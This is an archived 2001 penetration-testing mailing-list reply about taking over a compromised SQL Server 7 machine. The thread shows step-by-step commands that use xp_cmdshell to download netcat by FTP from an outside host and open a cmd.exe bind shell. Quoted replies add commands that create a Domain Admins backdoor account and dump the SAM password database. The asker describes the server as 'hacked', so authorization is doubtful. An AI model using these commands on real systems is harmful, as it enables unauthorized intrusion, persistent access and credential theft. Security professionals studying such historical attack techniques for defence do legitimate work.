Penetration Testing mailing list archives
Re: [PEN-TEST] Hacking a server through SQL SERVER 7
From: "Brentlinger, Mike (ISS eServices)" <mbrentli () ISS NET>
Date: Thu, 25 Jan 2001 14:38:33 -0500
Well if you were able to run commands via something like the net user commands people told you about previously (ie EXEC [master].[dbo].[xp_cmdshell] "net user") You could probably use something like the following commands to create a ftp script file and then have their machine Ftp out to x.x.x.x and pull down nc.exe
From there you can run netcat and you have a shell waiting for you to telnet
to. make the script echo user>ftpScript.txt echo password>>ftpScript.txt echo bin>>ftpScript.txt echo get nc.exe>>ftpScript.txt echo bye>>ftpScript.txt run the script to get netcat ftp -s:ftpScript.txt x.x.x.x del ftpScript.txt run netcat nc -l -p 999 -t -e cmd.exe Of course this all relies on your compromised SQL server being able to connect to some server via FTP and requires you to be able to have access to whatever port you open the shell on. Best of luck -Mike Brentlinger -----Original Message----- From: FiC To: PEN-TEST () SECURITYFOCUS COM Sent: 1/25/01 4:32 AM Subject: Re: Hacking a server through SQL SERVER 7 Thank you all for your valuable information. Is there anyway to upload/create a file in the hacked SQL SERVER through the system commands? I think that the machine is behind a Firewall and even if I start the FTP service I can't connect via ftp, and the port 139 is not open or its filtered. I've tried to create an .asp file with the "copy con" command, but I can't do it through the SQL console. How can I upload/create an .asp file to this server? Thanx.
Once you have access to a MSSQL 7 server via the "sa" account, you can
do
all sorts of fun things: Run system commands: EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass /ADD
/DOMAIN"
EXEC [master].[dbo].[xp_cmdshell] "net group 'Domain Admins' newuser
/ADD
/DOMAIN" You can also access the registry, send email, dump system
information...
Take a look at some of the Extended Stored Procedures in the [master] database with SQL Query Analyzer. Depending on the user the server
runs at
(normally SYSTEM or Administrator), you can usually use xp_cmdshell to rebuild the repair disk data with rdisk /s and snag the SAM database. I will be giving a presentation at the upcoming CanSecWest conference covering a variety of SQL server attacks, everything from general
procedure
exploitation to insertion techniques. At the conference, I will be releasing a handful of new tools, one of which exploits the RDS
component
in new ways, allowing access to SQL servers as well as proxying
requests to
internal systems through it. For more information on the conference, please see http://www.cansecwest.com, online registration should be available within a few weeks.
-- ~/ FiC /~
Current thread:
- [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 23)
- <Possible follow-ups>
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Derrick K. Bennett (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 H D Moore (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Attonbitus Deus (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 MadHat (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Brentlinger, Mike (ISS eServices) (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Frank Knobbe (Jan 25)